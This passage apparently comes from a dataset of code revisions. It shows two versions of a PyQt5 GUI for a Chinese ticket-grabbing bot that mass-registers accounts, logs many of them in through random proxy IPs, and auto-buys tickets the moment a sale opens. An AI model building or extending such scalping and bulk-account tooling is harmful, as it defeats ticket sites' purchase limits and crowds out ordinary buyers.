textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Example()\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n",
"step-4": "import ctypes\nimport win32con\nimport request_spider\nfrom selenium_tickets_spider import *\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nimport sys, time, re\nimport datetime\nSESSION_DATA = False\nSHOW_S_P = False\n\n\nclass Worker(QThread):\n valueChanged = pyqtSignal(int)\n handle = -1\n\n def run(self):\n global SESSION_DATA, EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread(win32con.\n PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n threads = []\n keywordJudge = ''\n\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status, self\n .output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName('MainWindow')\n MainWindow.resize(640, 478)\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n MainWindow.setFixedSize(self.width(), self.height())\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName('centralwidget')\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName('tabWidget')\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName('tab')\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName('pushButton')\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(' 请输入登陆个数')\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName('label_0')\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName('textBrowser_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName('tab_2')\n self.tabWidget.addTab(self.tab, '')\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName('tab_3')\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName('lineEdit')\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName('pushButton_2')\n self.pushButton_2.clicked.connect(self.search_1)\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName('label')\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName('label_2')\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName('comboBox')\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName('comboBox_2')\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName('label_3')\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName('lineEdit_1')\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n self.label_6.setObjectName('label_6')\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName('label_7')\n self.label_7.setStyleSheet('font-size:16px;color:red')\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName('label_8')\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName('lineEdit_8')\n self.lineEdit_8.setText('4')\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName('pushButton_3')\n self.pushButton_3.clicked.connect(self.search_2)\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName('pushButton_quit')\n self.pushButton_quit.clicked.connect(self.exit_quit)\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName('label_4')\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName('textBrowser')\n self.tabWidget.addTab(self.tab_2, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.tabWidget.addTab(self.tab_3, '')\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName('statusbar')\n MainWindow.setStatusBar(self.statusbar)\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName('pushButton')\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(' 请输入注册个数')\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName('textBrowser_3')\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName('label_5')\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate('MainWindow', '城市售票网-抢票'))\n self.pushButton.setText(_translate('MainWindow', '点击登录'))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab),\n _translate('MainWindow', '账号登录'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2),\n _translate('MainWindow', '抢购中心'))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3),\n _translate('MainWindow', '账号注册'))\n self.label_0.setText(_translate('MainWindow', '登录日志:'))\n self.pushButton_2.setText(_translate('MainWindow', '搜索名称'))\n self.pushButton_3.setText(_translate('MainWindow', '点击购买'))\n self.pushButton_quit.setText(_translate('MainWindow', '退出程序'))\n self.pushButton_4.setText(_translate('MainWindow', '点击注册'))\n self.label.setText(_translate('MainWindow', '已择场次:'))\n self.label_2.setText(_translate('MainWindow', '已择价格:'))\n self.label_3.setText(_translate('MainWindow', '购买总数量:'))\n self.label_4.setText(_translate('MainWindow', '购买日志:'))\n self.label_5.setText(_translate('MainWindow', '注册日志:'))\n self.label_6.setText(_translate('MainWindow', '已购买:'))\n self.label_7.setText(_translate('MainWindow', '0'))\n self.label_8.setText(_translate('MainWindow', '每个账号购买数量:'))\n self.textBrowser_3.setText('')\n self.textBrowser_2.setText('')\n self.textBrowser_1.setText('')\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n ipList = ['']\n self.textBrowser_2.append('开始登陆,请等待...')\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr, ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append('正在查询 %s 的所有场次和价格...' % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append('请等待...')\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i, eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i, price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append('查询成功,请在选择界面选择场次和价格...')\n global SESSION_DATA\n SESSION_DATA = True\n else:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append('查询失败,请确定您查询的节目存在...')\n print(err)\n sys.exit()\n\n def output_login_status(self):\n while True:\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.\n textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if '购买成功' in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.\n textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.\n textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append('请输入购买总数量...')\n return\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append('正在购买,请等待...')\n return\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def wait_sale(self):\n dateList = ex.saleTime\n print('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,等待购买!' % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) +\n '0000', '%Y%m%d%H%M%S')))\n if saleTimestamp <= int(time.time()):\n print('%s年%s月%s日%s时开始售票,开始购买!' % tuple(dateList))\n self.textBrowser_1.append('%s年%s月%s日%s时开始售票,开始购买!' % tuple(\n dateList))\n break\n time.sleep(1)\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append('开始购买,请您耐心等待...')\n\n def register(self):\n self.textBrowser_3.append('开始注册,请等待...')\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok)\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.\n Yes | QMessageBox.No)\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网')\n self.resize(680, 800)\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n self.setFixedSize(self.width(), self.height())\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller)\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.scroll)\n self.w.setLayout(self.vbox)\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self, '提示', '您确定选择无误吗?', QMessageBox.Yes |\n QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n self.cb1 = QCheckBox('全选', self.topFiller)\n self.cb1.move(20, 30)\n self.cb2 = QCheckBox('全选', self)\n self.cb2.move(20, 570)\n bt1 = QPushButton('确定', self)\n bt2 = QPushButton('刷新', self)\n bt1.move(20, 760)\n bt2.move(120, 760)\n self.cb1.stateChanged.connect(self.changecb1)\n self.cb2.stateChanged.connect(self.changecb2)\n bt1.clicked.connect(self.pitch_on)\n bt2.clicked.connect(self.create_c)\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for\n eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0][\n 'priceList']]\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n for i, item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60 + 30 * i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580, (len(self.sessionList) + 5) * 30)\n for i, item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570 + 30 * i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570 + 30 * i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn:\n if i.isChecked():\n for eventDate in self.eventDateList:\n if eventDate['eventDateName'] == i.text():\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n self.eventUrl.append(eventDate['eventUrl'])\n self.sessionName.append(eventDate['eventDateName'])\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0][\n 'priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?',\n QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if res == QMessageBox.Yes:\n self.close()\n else:\n print('输入内容不存在!')\n\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n ex = Example()\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n",
"step-5": "import ctypes\nimport win32con\nimport request_spider\nfrom selenium_tickets_spider import *\nfrom threading import Thread\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\nimport sys, time, re\nimport datetime\n\nSESSION_DATA = False\nSHOW_S_P = False\n\nclass Worker(QThread):\n\n valueChanged = pyqtSignal(int) # 值变化信号\n handle = -1\n\n def run(self):\n global SESSION_DATA,EXIT_COND\n try:\n self.handle = ctypes.windll.kernel32.OpenThread( # @UndefinedVariable\n win32con.PROCESS_ALL_ACCESS, False, int(QThread.currentThreadId()))\n except Exception as e:\n print('get thread handle failed', e)\n # print('thread id', int(QThread.currentThreadId()))\n # 循环发送信号\n while True:\n if SESSION_DATA:\n self.valueChanged.emit(1024)\n SESSION_DATA = False\n time.sleep(0.1)\n\n def exit_thread(self):\n os._exit(122)\n\n\nclass Ui_MainWindow(QMainWindow):\n\n threads = []\n keywordJudge = ''\n def __init__(self):\n super(Ui_MainWindow, self).__init__()\n # self.ex = Example()\n\n self.buy_succeed_count = 0\n for func in [self.output_buy_record, self.output_login_status,self.output_register_record]:\n thr = Thread(target=func)\n thr.setDaemon(True)\n thr.start()\n\n # 子线程\n self._thread = Worker(self)\n self._thread.finished.connect(self._thread.deleteLater)\n self._thread.valueChanged.connect(ex.create_c)\n self._thread.start()\n\n def setupUi(self, MainWindow):\n # MainWindow.setStyleSheet(\"#MainWindow{background-color: yellow}\")\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(640, 478)\n # MainWindow.setMinimumSize(640, 478)\n # MainWindow.setMaximumSize(640, 478)\n # 取消最大化\n MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n # 固定窗口大小\n MainWindow.setFixedSize(self.width(), self.height())\n # MainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint) \n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)\n self.tabWidget.setGeometry(QtCore.QRect(0, 0, 631, 461))\n self.tabWidget.setObjectName(\"tabWidget\")\n\n self.tab = QtWidgets.QWidget()\n self.tab.setObjectName(\"tab\")\n\n # 登录按钮\n self.pushButton = QtWidgets.QPushButton(self.tab)\n self.pushButton.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton.setObjectName(\"pushButton\")\n\n # 登陆个数输入框\n self.lineEdit_tab = QtWidgets.QLineEdit(self.tab)\n self.lineEdit_tab.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab.setPlaceholderText(\" 请输入登陆个数\")\n\n # 登录日志输出\n self.label_0 = QtWidgets.QLabel(self.tab)\n self.label_0.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_0.setObjectName(\"label_0\")\n\n # 注册日志\n self.textBrowser_2 = QtWidgets.QTextBrowser(self.tab)\n self.textBrowser_2.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_2.setObjectName(\"textBrowser_2\")\n\n\n # 登录页面\n self.tabWidget.addTab(self.tab, \"\")\n self.tab_2 = QtWidgets.QWidget()\n self.tab_2.setObjectName(\"tab_2\")\n\n self.tabWidget.addTab(self.tab, \"\")\n self.tab_3 = QtWidgets.QWidget()\n self.tab_3.setObjectName(\"tab_3\")\n\n self.lineEdit = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit.setGeometry(QtCore.QRect(90, 30, 171, 31))\n self.lineEdit.setObjectName(\"lineEdit\")\n\n # 查询商品名称\n self.pushButton_2 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_2.setGeometry(QtCore.QRect(30, 30, 58, 32))\n self.pushButton_2.setObjectName(\"pushButton_2\")\n self.pushButton_2.clicked.connect(self.search_1)\n\n\n self.label = QtWidgets.QLabel(self.tab_2)\n self.label.setGeometry(QtCore.QRect(30, 80, 54, 12))\n self.label.setObjectName(\"label\")\n\n self.label_2 = QtWidgets.QLabel(self.tab_2)\n self.label_2.setGeometry(QtCore.QRect(30, 130, 54, 12))\n self.label_2.setObjectName(\"label_2\")\n\n self.comboBox = QtWidgets.QComboBox(self.tab_2)\n self.comboBox.setGeometry(QtCore.QRect(90, 120, 191, 31))\n self.comboBox.setObjectName(\"comboBox\")\n # self.comboBox.currentText()\n\n self.comboBox_2 = QtWidgets.QComboBox(self.tab_2)\n self.comboBox_2.setGeometry(QtCore.QRect(90, 70, 459, 31))\n self.comboBox_2.setObjectName(\"comboBox_2\")\n\n # 选择数量\n self.label_3 = QtWidgets.QLabel(self.tab_2)\n self.label_3.setGeometry(QtCore.QRect(300, 40, 70, 12))\n self.label_3.setObjectName(\"label_3\")\n\n # 数量输入框\n self.lineEdit_1 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_1.setGeometry(QtCore.QRect(375, 32, 51, 27))\n self.lineEdit_1.setObjectName(\"lineEdit_1\")\n\n # 购买成功数量\n self.label_6 = QtWidgets.QLabel(self.tab_2)\n self.label_6.setGeometry(QtCore.QRect(450, 40, 54, 12))\n 